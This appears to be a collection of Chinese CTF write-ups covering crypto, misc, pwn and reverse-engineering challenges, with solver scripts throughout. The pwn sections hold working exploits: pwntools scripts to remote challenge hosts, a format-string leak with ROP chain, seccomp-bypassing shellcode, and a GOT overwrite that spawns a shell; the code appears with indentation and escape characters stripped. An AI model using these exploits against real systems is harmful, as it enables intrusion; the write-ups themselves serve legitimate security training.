ezzzecc
解题过程
看到其他数都给了,唯独p是通过加密的。
通过一次base62,4次base64即可解密得到一串不知名字符串
在通过与给定格式的p值相对比得到-11
写脚本跑出来原来的p值
data="""e2p.*'*-)+-,+*'&.&)&+'+&+-,',..,.(*,++-%()-&',,*--&%+,..(*.)%,)-+*,%%)+(*.,+',%(r"""
for i in range(len(data)):
print(chr(ord(data[i])+11),end="")
通过发现,其实k值也没有给出,需要自己写脚本爆破
M = 95258468765219141626168727997935766803481277588106799359407486570046359762703
a = 87425770561190618633288232353256495656281438408946725202136726983601884085917
b = 107879772066707091306779801409109036008421651378615140327877558014536331974777
def add(A,B):
if A==(0,0): return B
if B==(0,0): return A
x1,y1 = A
x2,y2 = B
if A!=B:
p = (y2-y1)*pow(x2-x1,M-2,M)
else:
p = (3*x1*x1+a)*pow(2*y1,M-2,M)
x3 = p*p-x1-x2
y3 = p*(x1-x3)-y1
return (x3%M,y3%M)
base = (34031022567935512558184471533035716554557378321289293120392294258731566673565, 74331715224220154299708533566163247663094029276428146274456519014761122295496)
pub = (49293150360761418309411209621405185437426003792008480206387047056777011104939, 43598371886286324285673726736628847559547403221353820773139325027318579443479)
X = (0,0)
for i in range(M):
if X==pub:
secret = i
print("secret:" + str(secret))
break
X = add(X, base)
print(i)
from libnum import s2n,n2s
from Crypto.Util.number import *
p = 95258468765219141626168727997935766803481277588106799359407486570046359762703
a = 87425770561190618633288232353256495656281438408946725202136726983601884085917
b = 107879772066707091306779801409109036008421651378615140327877558014536331974777
k = 166909
E=EllipticCurve(GF(p),[a,b])
c1 = E(3315847183153421424358678117707706758962521458183324187760613108746362414091 , 61422809633368910312843316855658127170184420570309973276760547643460231548014)
c2 = E(12838481482175070256758359669437500951915904121998959094172291545942862161864 , 60841550842604234546787351747017749679783606696419878692095419214989669624971)
cipher_left = 75142205156781095042041227504637709079517729950375899059488581605798510465939
cipher_right = 61560856815190247060747741878070276409743228362585436028144398174723191051815
m=c1-k*c2
print(n2s(int(cipher_left/m[0]))+n2s(int((cipher_right/m[1]))))
happy2024
解题过程
题目是RSA+AES的组合,其中RSA加密了AES的key,而AES的iv由矩阵乘法混淆了,实际上是一个hssp。
首先求解一下rsa。这里的hint比特关系非常明显,可以猜测是用格来打。梳理一下hint的组成:
根据该条件可以构造一个格,目的是得到每一维度量级在1024比特左右的三维向量。格子构造如下:
规约后理论上能得到的短向量是,但是实际测试发现无论怎么调系数都无法得到正确结果。于是用高斯启发式Gaussian Heuristic计算一下发现是卡了界的。于是考虑爆破几个比特,那么需要修改一下格的结构。这里有个小技巧是可以爆破p^2和 q^2,如果是直接爆破p q的话等式展开会麻烦不少。爆破和 的5个比特分别为i和j,设,那么新的格子如下:
拿到CBC_key之后再求一下iv即可。
对于hssp问题,论文A Polynomial-Time Algorithm for Solving the Hidden Subset Sum Problem给出了攻击方法:
实现一下算法求解即可:
from Crypto.Util.number import *
n = 60
m = 330
p = ...
w = ...
MM = ...
e = 0x10001
MM = matrix(GF(2), MM)
def allpmones(v):
return len([vj for vj in v if vj in [-1, 0, 1]]) == len(v)
# We generate the lattice of vectors orthogonal to b modulo x0
def orthoLattice(b, x0):
m = b.length()
M = Matrix(ZZ, m, m)
for i in range(1, m):
M[i, i] = 1
M[1:m, 0] = -b[1:m] * inverse_mod(b[0], x0)
M[0, 0] = x0
for i in range(1, m):
M[i, 0] = mod(M[i, 0], x0)
return M
def allones(v):
if len([vj for vj in v if vj in [0, 1]]) == len(v):
return v
if len([vj for vj in v if vj in [0, -1]]) == len(v):
return -v
return None
def recoverBinary(M5):
lv = [allones(vi) for vi in M5 if allones(vi)]
n = M5.nrows()
for v in lv:
for i in range(n):
nv = allones(M5[i] - v)
if nv and nv not in lv:
lv.append(nv)
nv = allones(M5[i] + v)
if nv and nv not in lv:
lv.append(nv)
return Matrix(lv)
def kernelLLL(M):
n = M.nrows()
m = M.ncols()
if m < 2 * n:
return M.right_kernel().matrix()
K = 2 ^ (m // 2) * M.height()
MB = Matrix(ZZ, m + n, m)
MB[:n] = K * M
MB[n:] = identity_matrix(m)
MB2 = MB.T.LLL().T
assert MB2[:n, : m - n] == 0
Ke = MB2[n:, : m - n].T
return Ke
def attack(m, n, p, h):
# This is the Nguyen-Stern attack, based on BKZ in the second step
print("n =", n, "m =", m)
iota = 0.035
nx0 = int(2 * iota * n ^ 2 + n * log(n, 2))
print("nx0 =", nx0)
x0 = p
b = vector(h)
# only information we get
M = orthoLattice(b, x0)
t = cputime()
M2 = M.LLL()
print("LLL step1: %.1f" % cputime(t))
# assert sum([vi == 0 and 1 or 0 for vi in M2 * X]) == m - n
MOrtho = M2[: m - n]
print(" log(Height, 2) = ", int(log(MOrtho.height(), 2)))
t2 = cputime()
ke = kernelLLL(MOrtho)
print(" Kernel: %.1f" % cputime(t2))
print(" Total step1: %.1f" % cputime(t))
if n > 170:
return
beta = 2
tbk = cputime()
while beta < n:
if beta == 2:
M5 = ke.LLL()
else:
M5 = M5.BKZ(block_size=beta)
# we break when we only get vectors with {-1,0,1} components
if len([True for v in M5 if allpmones(v)]) == n:
break
if beta == 2:
beta = 10
else:
beta += 10
print("BKZ beta=%d: %.1f" % (beta, cputime(tbk)))
t2 = cputime()
MB = recoverBinary(M5)
print(" Recovery: %.1f" % cputime(t2))
print(" Number of recovered vector = ", MB.nrows())
print(" Number of recovered vector.T = ", MB.ncols())
return MB
res = attack(m, n, p, w)
最后解aes。
Signature
解题过程
proof过程根据逻辑编写python代码爆破
from pwn import *
from Crypto.Util.number import *
import gmpy2
r = remote('',1337)
context.log_level = 'debug'
def proof():
r.recvuntil(b'Your gift --> ')
gift = r.recvline()[:-1].decode()
password = 'happy_the_year_of_loong'
l = 19
table = [i for i in range(len(password)) if password[i] in string.ascii_lowercase]
# print(table)
for i in range(2 ** l):
pad = bin(i)[2:].zfill(l)
tmp_list = list(password)
for j in range(len(table)):
if pad[j] == '0':
tmp_list[table[j]] = tmp_list[table[j]].upper()
payload = ''.join(tmp_list)
if hashlib.sha256(payload.encode()).hexdigest()[:6] == gift:
r.recvuntil(b'>')
r.sendline(payload.encode())
return
proof()
成功爆破得解进入下一环节。
之后是DSA签名,主要洞在签名部分的系数k上
k = int(hashlib.md5(os.urandom(20)).hexdigest(),16)
这样生成的系数k为128位,偏小,可以通过格基规约的方法得解。通过8次交互获取数据构造格。
首先先理清楚签名关系。x是私钥大小为160位,构造等式为。
令,构造格子如下
可以得到系数k,之后再计算x。得到的未必就是x的精确值,这里用系数代回式子得到x,完整exp如下
from pwn import *
from Crypto.Util.number import *
import gmpy2
r = remote('116.205.134.67',1337)
context.log_level = 'debug'
def proof():
r.recvuntil(b'Your gift --> ')
gift = r.recvline()[:-1].decode()
password = 'happy_the_year_of_loong'
l = 19
table = [i for i in range(len(password)) if password[i] in string.ascii_lowercase]
for i in range(2 ** l):
pad = bin(i)[2:].zfill(l)
tmp_list = list(password)
for j in range(len(table)):
if pad[j] == '0':
tmp_list[table[j]] = tmp_list[table[j]].upper()
payload = ''.join(tmp_list)
if hashlib.sha256(payload.encode()).hexdigest()[:6] == gift:
r.recvuntil(b'>')
r.sendline(payload.encode())
return
proof()
r.recvuntil(b'>')
r.sendline(b'3')
r.recvuntil(b'Oh,your key is (')
p,q,g = list(map(int,r.recvline()[:-2].decode().split(',')))
ms = [str(i).encode() for i in range(8)]
rs = []
ss = []
hs = []
for m in ms:
H = int(hashlib.sha256(m).hexdigest(), 16)
r.recvuntil(b'>')
r.sendline(b'1')
r.recvuntil(b'Username:')
r.sendline(m)
r.recvuntil(b'This is your signature -- > ')
R,S = list(map(int,r.recvline()[:-1].decode().split(',')))
rs.append(R)
ss.append(S)
hs.append(H)
def getk0(q,rs,ss,hs):
A = []
B = []
n = len(rs)
for i in range(n):
a = rs[i] * inverse_mod(ss[i], q) % q
b = hs[i] * inverse_mod(ss[i], q) % q
A.append(a)
B.append(b)
mat = [[0 for _ in range(n + 2)] for _ in range(n + 2)]
for i in range(n):
mat[i][i] = q
mat[-2][i] = A[i]
mat[-1][i] = B[i]
mat[-2][-2] = 1 / (2 ** 32)
mat[-1][-1] = 2 ** 128
mat = matrix(QQ, mat)
print(mat.LLL())
return abs(int(mat.LLL()[1][0]))
k0 = getk0(q,rs,ss,hs)
print(f'k0 --> {k0}')
r0 = rs[0]
s0 = ss[0]
H0 = hs[0]
pri = int((s0 * k0 - H0) * gmpy2.invert(r0,q) % q)
k = int(hashlib.md5(os.urandom(20)).hexdigest(),16)
m = b'admin'
H = int(hashlib.sha256(m).hexdigest(),16)
rr = pow(g,k,p) % q
s = pow(k,-1,q) * (H + pri * rr) % q
r.sendline(b'2')
r.recvuntil(b'r:')
r.sendline(str(rr).encode())
r.recvuntil(b's:')
r.sendline(str(s).encode())
r.interactive()
class
解题过程
下载附件得到一个class文件,打开可以发现是一个python文件,里面有很多的类。搜索一下OS 命令,可以发现存在一个 cat /flag
该函数肯定和flag有关,每个类和函数均为_符号+八个字节,尝试将执行os.system('cat /flag')的整个利用链的所有类和函数全部统计出来
写一个python脚本进行污点分析:
import ast
import astor
with open("class", "r") as file:
source_code = file.read()
syntax_tree = ast.parse(source_code)
class_dict = {}
for node in syntax_tree.body:
if isinstance(node, ast.ClassDef):
class_name = node.name
class_dict[class_name] = {}
for inner_node in node.body:
if isinstance(inner_node, ast.FunctionDef):
func_name = inner_node.name
class_dict[class_name][func_name] = []
for code in inner_node.body:
class_dict[class_name][func_name].append(astor.to_source(code).strip())
class_keys = []
for func_dict in class_dict.items():
if 'os.system' in str(func_dict):
sub = func_dict[1][list(func_dict[1].items())[0][0]][0].split('n')[0].split(' ')
if sub[2] == '>':
if int(sub[1]) < int(sub[3][:-1]):
continue
elif sub[2] == '<':
if int(sub[1]) > int(sub[3][:-1]):
continue
class_keys.append(func_dict[0])
for key in class_keys:
class_key = key
func_key = list(class_dict[class_key])[0]
list_class = [class_key]
flag = 1
flags = 0
while flag != 0 and flags == 0:
flag = 1
flags = 0
for func_dict in class_dict.items():
for code in func_dict[1].items():
if class_key in code[1][0] and func_key in code[1][0]:
sub = code[1][0].split('n')[0].split(' ')
if sub[2] == '>':
if int(sub[1]) < int(sub[3][:-1]):
flag = -1
elif sub[2] == '<':
if int(sub[1]) > int(sub[3][:-1]):
flag = -1
flags = 2
func_key = code[0]
class_key = func_dict[0]
list_class.append(class_key)
else:
if flag == -1:
flags = 1
if flags == 2:
flags = 0
continue
if flag == 1 and flags == 0:
break
if flag != -1:
for cla in list_class:
print(cla[1:].replace('O', '0'), end='')
跑一遍即可得到一整个利用链的命名顺序,注意将’O’字符转化为’0’字符
做一个hex解密,可以得到是7z压缩包
解压压缩包即可得到flag:
SavethePrincess
解题过程
通过格式化字符串漏洞泄漏libc_base,canary,pie_base,stack地址,
因为禁用了exevce函数,进而通过构造orw获取flag。
from pwn import *
from struct import *
from ctypes import *
#import ctf_pb2
c = cdll.LoadLibrary('./libc.so.6')
# srop : frame = SigreturnFrame()
# fmt : fmtstr_payload(offset=7,writes={0x4031E0:0x0401445,0x403410:0x401445},numbwritten=((14*2)+1),write_size='short')
s = lambda a :pw.send(a)
sl = lambda a :pw.sendline(a)
sa = lambda a,b :pw.sendafter(a,b)
sla = lambda a,b :pw.sendlineafter(a,b)
r = lambda a=6666 :pw.recv(a)
rl = lambda :pw.recvline()
ru = lambda a,b=True :pw.recvuntil(a,b)
g64 = lambda :u64(pw.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))
g32 = lambda :u32(pw.recvuntil(b'xf7').ljust(4,b'x00'))
gl = lambda a :u64(pw.recvuntil(a,drop=True).ljust(8,b'x00'))
gc = lambda a :u64(pw.recv(7).rjust(8,b'x00'))
pwpw = lambda :pw.interactive()
lss = lambda s :log.success('�33[1;31;40m%s --> 0x%x �33[0m' % (s, eval(s)))
cal = lambda a,b :((a - b) + 0x10000) % 0x10000
def sb(libc_base):
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
def orw(libc_base):
return libc_base + libc.sym['open'], libc_base + libc.sym['read'], libc_base + libc.sym['write']
def search():
libc = LibcSearcher("puts", puts)
libc_base = puts - libc.dump("puts")
system = libc.dump("system") + libc_base
binsh = libc.dump("str_bin_sh") + libc_base
return system,binsh
def dbg(a=''):
if a !='':
gdb.attach(pw,a)
pause()
else:
gdb.attach(pw)
pause()
# context(os = 'linux', arch = 'amd64', log_level = 'debug')
# context.arch='i386'
context.terminal=["tmux" ,"split" ,"-h"]
context.arch = 'amd64'
file = './SavethePrincess'
elf = ELF(file)
#libc = ELF('/home/pw/pwn_tools/glibc-all-in-one/libs/2.35-0ubuntu3_amd64/libc.so.6')
libc = ELF('./libc.so.6')
debug = 1
if debug == 0:
pw = process(file)
if debug == 1:
pw = remote('127.0.0.1',2000)
if debug == 2:
gdbscript = '''
set debug-file-directory /home/pwn_tools/glibc-all-in-one/libs/2.31-0ubuntu9.16_amd64/.debug/
continue
'''
pw = gdb.debug(file, gdbscript=gdbscript)
#----------------------------------------------------------------------
def magic(pd):
sla(b'> ',str(1))
sa(b':',pd)
# dbg('b *$rebase(0x15f2)')
flag = b""
key = b""
for i in range(8):
key = flag
print(len(flag))
for k in range(ord('a'),ord('z')+1):
if len(flag) == 7:
key = flag + p8(k)
key = key.ljust(10,b'a')
magic(key)
print(rl())
if b'successfully' not in rl():
continue
else:
flag += chr(k).encode()
break
key = flag + p8(k)
key = key.ljust(10,b'a')
magic(key)
ru(b'is ')
x = ru(b'n')
print(x)
if(len(x) != 10 and int(x[-1]) == i+1):
flag += chr(k).encode()
print(flag)
# pause()
break
print(flag)
s(b'n')
magic(flag)
# dbg('b *$rebase(0x166a)')
s(b'%15$p%9$p%11$p%10$p')
rl()
rl()
libc_base = int(pw.recv(14),16)-0x29d90
canary = int(pw.recv(18),16)
pie_base = int(pw.recv(14),16) - 121 - 0x01745
stack = int(pw.recv(14),16)
lss('libc_base')
lss('canary')
lss('pie_base')
lss('stack')
rdi = libc_base + 0x2a3e5
rsi = libc_base + 0x2be51
rdx_rbx = libc_base + 0x00904a9
rax = libc_base + 0x45eb0
r13 = libc_base + 0x0000000000041c4a
rcx = libc_base + 0x000000000003d1ee
xchg_r8_rax = libc_base + 0x9998e
mov_r9 = libc_base + 0xd39d7
# 0x00000000000d39d7 : push 0 ; mov r9, qword ptr [rsp + 0x10] ; call r13
r10 = pie_base + 0x017D5
syscall = libc_base + 0x11481a
xchg_rsi_rax = 0x00000000001b5b65 + libc_base
# 0x00000000001b5b65 : xchg rsi, rax ; jmp qword ptr [rdx - 0xd]
# dbg('b *$rebase(0x16ed)')
payload = p64(rdi)+p64(0xFFFFFFFFFFFFFFFF - 99)+p64(rsi)+p64(pie_base+0x4010)+p64(libc_base+libc.sym['openat'])
payload += p64(r10)+p64(2)+p64(rcx)+p64(2)+p64(r13)+p64(syscall)+p64(rdx_rbx)+p64(7)+p64(0)+p64(rdi)+p64(0)+p64(rsi)+p64(0x50)+p64(rax)+p64(3)+p64(xchg_r8_rax)+p64(0)*3+p64(rax)+p64(9)+p64(mov_r9+2)+p64(0)*2+p64(0)+b'a'*8+p64(rdx_rbx)+p64(stack+0x100+0xd)*2+p64(xchg_rsi_rax)+p64(rdi)*2+p64(1)+p64(rdx_rbx)+p64(0x30)*2+p64(libc_base+libc.sym['write'])
print("len :"+hex(len(payload)))
sla(b'> ',str(2))
sl(b'a'*(0x40-8) + p64(canary) + p64(0) + payload)
# dbg()
pwpw()
Shuffled_Execution
解题过程
保护全开,且开启沙盒
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x0d 0xc000003e if (A != ARCH_X86_64) goto 0015
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x0a 0xffffffff if (A != 0xffffffff) goto 0015
0005: 0x15 0x09 0x00 0x00000000 if (A == read) goto 0015
0006: 0x15 0x08 0x00 0x00000001 if (A == write) goto 0015
0007: 0x15 0x07 0x00 0x00000002 if (A == open) goto 0015
0008: 0x15 0x06 0x00 0x00000011 if (A == pread64) goto 0015
0009: 0x15 0x05 0x00 0x00000013 if (A == readv) goto 0015
0010: 0x15 0x04 0x00 0x00000028 if (A == sendfile) goto 0015
0011: 0x15 0x03 0x00 0x0000003b if (A == execve) goto 0015
0012: 0x15 0x02 0x00 0x00000127 if (A == preadv) goto 0015
0013: 0x15 0x01 0x00 0x00000142 if (A == execveat) goto 0015
0014: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0015: 0x06 0x00 0x00 0x00000000 return KILL
向rwx段读入shellcodeshuffle()函数根据shellcode长度随机打乱读入的shellcode 构造含x00的shellcode尽早结束strlen,降低shuffle()影响 使用openat+mmap+writev绕过沙盒
from pwn import *
context(log_level='debug', arch='amd64', terminal=['tmux', 'splitw', '-h'])
io = process("./Shuffled_Execution")
# io = remote("127.0.0.1", 9999)
# gdb.attach(io)
payload = asm('''
xor eax , 0x1111
xor eax , eax
.rept 3
nop
.endr
mov rsp , 0x1337000
mov rdi , 3
lea rsi , [rip+path]
mov rdx , 0
mov rax , 257
syscall
mov rdi , 0x1337000
mov rsi , 0x1000
mov rdx , 7
mov r10 , 0x02
mov r8 , 3
mov r9 , 0
mov rax , 9
syscall
mov rdi , 1
mov rsi , 0x1337400
lea rcx , [rax]
mov [rsi] , rcx
add rsi , 8
mov dword ptr [rsi] , 0x50
add rsi , 8
mov [rsi] , rcx
sub rsi , 0x10
mov rdx , 0x1
mov rax , 20
syscall
path:
.string "/flag.txt"
''')
print(payload)
io.sendafter(".n", payload)
io.interactive()
stdout
解题过程
题目的主要逻辑就是main函数 extend函数是为了多几个函数 用来扩充got表 否则在解题过程中 会覆盖到stdout
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[80]; // [rsp+0h] [rbp-50h] BYREF
init(argc, argv, envp);
puts("where is my stdout???");
read(0, buf, 0x60uLL);
return 0;
}
可以溢出0x10字节 用来覆盖rbp和retaddr
表面上是一个非常简单的ret2libc加上栈迁移
实际上我对缓冲区动了手脚
int init()
{
setvbuf(stdout, 0LL, 0, 0LL);
return setvbuf(stdin, 0LL, 2, 0LL);
}
stdout被我改成了全缓冲区 这意味着要么用几十万甚至更多的字节填满缓冲区 要么就利用fflush函数清空
但是这题没有给怎么 想到的是覆盖got表 发现setvbuf的got表和fflush比较接近 只需要爆破一位 十六分之一的概率
同时 为了不破坏其他函数的got表 我们需要先计算偏移 使得在覆盖got表的时候能够正常返回下一个链
最后利用setvbuf成功清空缓存区 泄露出libc地址 打栈迁移getshell即可
from pwn import*
from ctypes import *
#io = process("./pwn")
io = remote("127.0.0.1",10002)
elf = ELF("./pwn")
context.terminal = ['tmux','splitw','-h']
libc = ELF("./glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc-2.31.so")
context.arch = "amd64"
context.log_level = "debug"
# io = process("./pwn")
# payload = cyclic(0x50)+p64(0x404090+0x50)+p64(0x40134D)
# io.send(payload)
# payload = p64(elf.bss(0xb00)+0x50)+p64(0x40134D)+cyclic(0x40)+p64(elf.got['setvbuf']+0x50)+p64(0x40134D)
# io.send(payload)
# payload = 'x40xc3'
# io.send(payload)
# rdi_addr=0x00000000004013d3
# read_got = elf.got['read']
# puts_plt = elf.sym['puts']
# main_addr = elf.sym['main']
# leave_ret = 0x0000000000401285
# payload = p64(rdi_addr)+p64(read_got)+p64(puts_plt)+p64(main_addr)+cyclic(0x30)+p64(0x404b70-0x8)+p64(leave_ret)
# # gdb.attach(io,'b *0x40136E')
# # pause(0)
# io.send(payload)
# io.recvuntil("x0a")
# libc_addr = u64(io.recv(6).ljust(8,b'x00'))-libc.sym['read']
# success("libc_addr :"+hex(libc_addr))
# system_addr = libc.sym['system']+libc_addr
# binsh_addr = libc_addr + next(libc.search(b"/bin/sh"))
# ret_addr = 0x000000000040101a
# payload = p64(ret_addr)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)+cyclic(0x30)+p64(0x404b38-0x8)+p64(leave_ret)
# # gdb.attach(io,'b *0x40136E')
# # pause(0)
# io.send(payload)
# io.interactive()
def exploit():
io = remote("124.71.97.27",10002)
payload = cyclic(0x50)+p64(0x404090+0x50)+p64(0x40134D)
sleep(0.5)
io.send(payload)
payload = p64(elf.bss(0xb00)+0x50)+p64(0x40134D)+cyclic(0x40)+p64(elf.got['setvbuf']+0x50)+p64(0x40134D)
sleep(0.5)
io.send(payload)
payload = 'x40xc3'
sleep(0.5)
io.send(payload)
rdi_addr=0x00000000004013d3
read_got = elf.got['read']
puts_plt = elf.sym['puts']
main_addr = elf.sym['main']
leave_ret = 0x0000000000401285
payload = p64(rdi_addr)+p64(read_got)+p64(puts_plt)+p64(main_addr)+cyclic(0x30)+p64(0x404b70-0x8)+p64(leave_ret)
# gdb.attach(io,'b *0x40136E')
# pause(0)
sleep(0.5)
io.send(payload)
io.recvuntil("x0a")
libc_addr = u64(io.recv(6).ljust(8,b'x00'))-libc.sym['read']
success("libc_addr :"+hex(libc_addr))
system_addr = libc.sym['system']+libc_addr
binsh_addr = libc_addr + next(libc.search(b"/bin/sh"))
ret_addr = 0x000000000040101a
payload = p64(ret_addr)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)+cyclic(0x30)+p64(0x404b38-0x8)+p64(leave_ret)
# gdb.attach(io,'b *0x40136E')
# pause(0)
sleep(0.5)
io.send(payload)
io.sendline("cat flag")
result = io.recv(timeout=1)
io.interactive()
if __name__ == '__main__':
try_count = 0
while(True):
try:
exploit()
except:
try_count += 1
print("failed :{}".format(try_count))
BEDTEA
解题过程
根据字符串可以很快定位到关键函数
调试发现这些是没有逻辑的垃圾值,只是为了混淆而出
这个地方是一个时间戳检测,通过两次时间戳的不同来获取运行时间然后可以用来做反调试
只要不在这两个地方之间下断点就好了,或者手动patch一下
这里也是通过一个PEB来实现反调试,调试的话会赋值为3,不调试则是1
可以通过修改eax寄存器的值来达到绕过
继续跟进下面的逻辑,很明显的tea特征但是细心可以发现是魔改了左移右移常数和轮数
上面有常数的赋值
其实继续调试到下面,会发现这里的key后面会被再次赋值
所以这个并不是真正的key,真正的key可以在调试的时候拿到,轮数也可以调试拿到
这里原来通过key可以看出3,5,8,13,21,34这其实是斐波那契数列
(源码中也可以看见这里是通过初始矩阵然后矩阵乘法来获取斐波那契数列
但是考虑到可能有点些许脑洞于是就成了现在这样,调试的时候可以拿key)
后面两个tea函数是相同的,只是key是不同的,耐心调试就可以拿到
此处不一一赘述
这两个函数是关键,跟进一下
有能力的师傅可以逆向看出来这就是一个通过迭代实现二叉树的前序遍历构造(跟进就会无限套娃),
下面一个函数就是二叉数的后序遍历
把值拿出来
其实这里想的是可以通过前后的输入输出来看这两段干的是一个翻转的功能,即把加密后的结果进行翻转
然后对最后的值进行异或,数据类型被优化了,其实就是异或0x33
最后v11和v12是我们的加密的结果和密文
编写脚本即可得到flag
#include <stdio.h>
#include <stdint.h>
//0x76, 0x71, 0x9d, 0xe7, 0x70, 0x77, 0x3f, 0xa3, 0x2, 0xf1,
// 0x8d, 0xc9, 0x2, 0xc6, 0xa2, 0x4b, 0xba, 0x19, 0x56, 0x5, 0xf2,
// 0x89, 0x5e, 0xe0
// 异或0x33得到:
// 0x4542AED4 0X43440C90,
// 0x31C2BEFA 0X31F59178,
// 0x892A6536 0XC1BA6DD3
//解密函数
void decrypt(uint32_t* v, uint32_t* k) {
uint32_t v0 = v[0], v1 = v[1], sum = 0x987E55D0, i;
uint32_t delta = 0x9e3449b8;
uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
for (i = 0; i<22; i++) {
v1 -= ((v0 << 5) + k2) ^ (v0 + sum) ^ ((v0 >> 4) + k3);
v0 -= ((v1 << 5) + k0) ^ (v1 + sum) ^ ((v1 >> 4) + k1);
sum -= delta;
}
v[0] = v0; v[1] = v1;
}
int main()
{
// v为要加解密的数据,两个32位无符号整数
uint32_t v[6] = { 0XC1BA6DD3,0X892A6536,0X31F59178,0X31C2BEFA,0X43440C90,0X4542AED4};
// k为加解密密钥,4个32位无符号整数,密钥长度为128位,斐波那契数列
uint32_t k[4] = { 3,5,8,13 };
uint32_t k1[4] = { 21,34,55,89 };
uint32_t k2[4]={144,233,377,610};
decrypt(v, k);
decrypt(v+2, k1);
decrypt(v+4, k2);
puts((char*)v);
printf("n");
return 0;
}
//flag{y0u_reallyl1ke_te@}
HardSignin
解题过程
脱UPX壳
直接脱壳会失败,010editor打开,修复区段名,将VMP改为UPX即可一键脱壳
TLS函数
花指令
TLS函数中存在花指令,手动修复后看到真实逻辑
其中TLS3的花指令将0x4011e8-0x4011f5这段全部nop即可
每个TLS函数都存在反调试操作,均为常规反调试API,全部patch即可
TLS0-SMC
TLS0反调试直接patch跳转地址绕过exit分支
执行了SMC操作解密main函数代码,并设置随机数种子为0x114514
TLS1-base换表
直接patch跳转地址绕过exit分支
生成伪随机数进行base64换表操作,设置随机数种子为0x1919810
TLS2-生成key
直接patch跳转地址绕过exit分支
TLS2生成rc4和xtea的key
TLS3
TLS3只执行了反调试,检测到调试器时会强制终止进程
设置ZwSetInformationThread的第二个参数为1即可
main函数
idapython修复或者动调看main函数均可
idapython脚本
import ida_bytes
addr=0x401890
for i in range(170):
data=ida_bytes.get_byte(addr)
data^=0x66
ida_bytes.patch_byte(addr,data)
addr+=1
解密后,逻辑清晰,输入flag后对flag进行base64+rc4+xtea加密
checkflag
base64
rc4
xtea
getflag
密文静态直接复制,base64表和key需要动调或者脚本生成
密文
unsigned char encflag[64]={ 0x59,0x1b,0xfd,0xb4,0x6b,0xb8,0xbe,0xd9,0xb3,0xd3,0x77,0xd6,0xf0,0x65,0x5f,0x18,0xa0,0x9d,0x3a,0x53,0x6d,0x4a,0x7b,0x26,0x74,0x3a,0x9c,0x4e,0x20,0x43,0x19,0xd8,0x72,0xed,0x95,0xb5,0x9c,0x5,0x22,0x56,0xcb,0x7a,0x11,0x91,0x9f,0x7a,0xbc,0xc,0x4a,0x69,0x6d,0xce,0x3d,0xb4,0xab,0x29,0x61,0xfa,0x62,0x32,0xb4,0xec,0x4c,0xb6}
base64表
unsigned char base64_table[64]="4yZRiNP8LoK/GSA5ElWkUjXtJCz7bMYcuFfpm6+hV0rxeHIdwv32QOTnqg1BDsa9"
rc4和xtea的key
unsigned char[16] rc4_key={0x76,0x89,0x33,0x49,0x19,0x13,0xc3,0xc7,0xad,0xd8,0xe4,0x68,0xfc,0x48,0x4,0xbc};
unsigned char[16] xtea_key={0xdd,0x5b,0xaa,0xc,0x24,0x69,0x84,0xd6,0xb8,0x1e,0x4,0x51,0x6,0xab,0x2a,0x8b}
一键getflag脚本
#include<stdio.h>
#include<Windows.h>
#include<stdio.h>
#include<stdlib.h>
#include<stdint.h>
unsigned char sbox[256];
void swap(unsigned char* a, unsigned char* b)
{
unsigned char tmp = *a;
*a = *b;
*b = tmp;
}
void init_sbox(unsigned char key[], int keyLen) {
for (int i = 0; i < 256; i++)//赋值
sbox[i] = i;
unsigned char Ttable[256] = { 0 };
for (int i = 0; i < 256; i++)
Ttable[i] = key[i % keyLen];//根据初始化t表
for (int j = 0, i = 0; i < 256; i++)
{
j = (j + sbox[i] + Ttable[i]) % 256; //打乱s盒
swap(&sbox[i], &sbox[j]);
}
}
void RC4_enc_dec(unsigned char data[], int dataLen, unsigned char key[], int keyLen) {
int k = 0, i = 0, j = 0, t = 0;
init_sbox(key, keyLen);
for (int h = 0; h < dataLen; h++)
{
i = (i + 1) % 256;
j = (j + sbox[i]) % 256;
swap(&sbox[i], &sbox[j]);
t = (sbox[i] + sbox[j]) % 256;
k = sbox[t]; //求密钥流,并对明文加密
data[h] ^= k;
}
}
//查找下标所在位置
unsigned char findPos(const unsigned char* base64_map, unsigned char chr)
{
for (int i = 0; i < strlen((const char*)base64_map); i++)
{
if (base64_map[i] == chr)
return i;
}
}
unsigned char* base64_decode(unsigned char* base64_table,const unsigned char* buf, unsigned int buflen)
{
unsigned int len, mod = 0;
unsigned char* res;
if (buf[buflen - 1] == '=')
{
if (buf[buflen - 2] == '=')
{
mod = 1;
len = buflen / 4 * 3 - 2;
}
else
{
mod = 2;
len = buflen / 4 * 3 - 1;
}
}
else
len = buflen / 4 * 3;
res = (unsigned char*)malloc(sizeof(unsigned char) * len);
unsigned char tmp[4] = { 0 };
for (int i = 0, j = 0; j < len - mod; j += 3, i += 4)
{
tmp[0] = findPos(base64_table, buf[i]); //code[]每一个字符对应base64表中的位置,用位置值反推原始数据值
tmp[1] = findPos(base64_table, buf[i + 1]);
tmp[2] = findPos(base64_table, buf[i + 2]);
tmp[3] = findPos(base64_table, buf[i + 3]);
res[j] = tmp[0] << 2 | tmp[1] >> 4; //取出第一个字符对应base64表的十进制数的前6位与第二个字符对应base64表的十进制数的后2位进行组合
res[j + 1] = tmp[1] << 4 | tmp[2] >> 2; //取出第二个字符对应base64表的十进制数的后4位与第三个字符对应bas464表的十进制数的后4位进行组合
res[j + 2] = tmp[2] << 6 | tmp[3]; //取出第三个字符对应base64表的十进制数的后2位与第4个字符进行组合
}
switch (mod)
{
case 0:break;
case 1:
{
tmp[0] = findPos(base64_table, buf[buflen - 4]);
tmp[1] = findPos(base64_table, buf[buflen - 3]);
res[len - 1] = tmp[0] << 2 | tmp[1] >> 4;
break;
}
case 2: {
tmp[0] = findPos(base64_table, buf[buflen - 4]);
tmp[1] = findPos(base64_table, buf[buflen - 3]);
tmp[2] = findPos(base64_table, buf[buflen - 2]);
res[len - 2] = tmp[0] << 2 | tmp[1] >> 4;
res[len - 1] = tmp[1] << 4 | tmp[2] >> 2;
break;
}
}
return res;
}
